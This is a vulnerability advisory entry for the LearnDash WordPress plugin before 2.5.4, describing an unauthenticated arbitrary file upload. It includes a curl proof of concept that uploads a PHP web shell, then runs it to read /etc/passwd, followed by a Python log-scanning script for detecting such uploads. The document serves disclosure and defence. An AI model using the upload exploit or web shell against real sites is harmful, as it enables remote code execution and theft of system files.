WordPress Plugin Vulnerabilities
LearnDash < 2.5.4 - Unauthenticated Arbitrary File Upload
Description
The plugin performs no authorisation check and no validation of the uploaded file in the learndash_assignment_process_init() function, which could allow unauthenticated users to upload arbitrary files to the web server.
Proof of Concept
$ echo '<?php echo exec("ls -la /etc/passwd");' > shell.php.php
$ curl -F "post=foobar" -F "course_id=foobar" -F "uploadfile=foobar" -F "uploadfiles[]=@...hell.php.php" https://victim.tld/
$ curl 'https://victim.tld/wp-content/uploads/assignments/shell.php.'
-rw-r--r-- 1 root root 2385 Apr 14 2017 /etc/passwd
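For triage on a site that ran an affected version, the following added example (not part of the original advisory or of the plugin) scans web access logs for requests to script-like file names under the uploads/assignments directory shown above, including double extensions and the trailing-dot form. It assumes the Apache/nginx "combined" log format; the function names, the extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Upload directory named in the advisory's proof of concept.
UPLOAD_DIR = "/wp-content/uploads/assignments/"
# Extensions commonly mapped to the PHP handler (constructed list, adjust per server).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}


def is_script_name(filename):
    """True if any dot-separated part after the base name is a script extension.

    Checking every part catches double extensions ("a.php.jpg") and a
    trailing dot ("a.php."), not just names that end in ".php".
    """
    parts = filename.lower().split(".")[1:]
    return any(p.strip() in SCRIPT_EXTS for p in parts)


def find_suspicious_requests(lines):
    """Return (ip, timestamp, path, status) for script-like requests under UPLOAD_DIR."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # line is not in the assumed format
        # Decode percent-encoding so "a%2Ephp" is seen as "a.php".
        path = unquote(urlsplit(m["target"]).path)
        if UPLOAD_DIR not in path:
            continue
        if is_script_name(path.rsplit("/", 1)[-1]):
            hits.append((m["ip"], m["ts"], path, int(m["status"])))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Jan/2018:10:00:01 +0000] "POST / HTTP/1.1" 200 512 "-" "curl/7.58.0"',
    '198.51.100.7 - - [06/Jan/2018:10:00:05 +0000] "GET /wp-content/uploads/assignments/shell.php. HTTP/1.1" 200 64 "-" "curl/7.58.0"',
    '203.0.113.9 - - [06/Jan/2018:10:02:00 +0000] "GET /wp-content/uploads/assignments/essay.pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Jan/2018:10:03:00 +0000] "GET /wp-content/uploads/assignments/a%2Ephp?x=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the server returned content for a script-like name in the upload directory and the file on disk should be inspected; the upload POST itself cannot be identified this way because access logs do not record request bodies.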
Affects Plugins
References
Miscellaneous
Original Researcher
Jerome Bruandet (NinTechNet)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2018-01-06 (about 6 years ago)
Added
2021-10-20 (about 2 years ago)
Last Updated
2022-04-14 (about 2 years ago)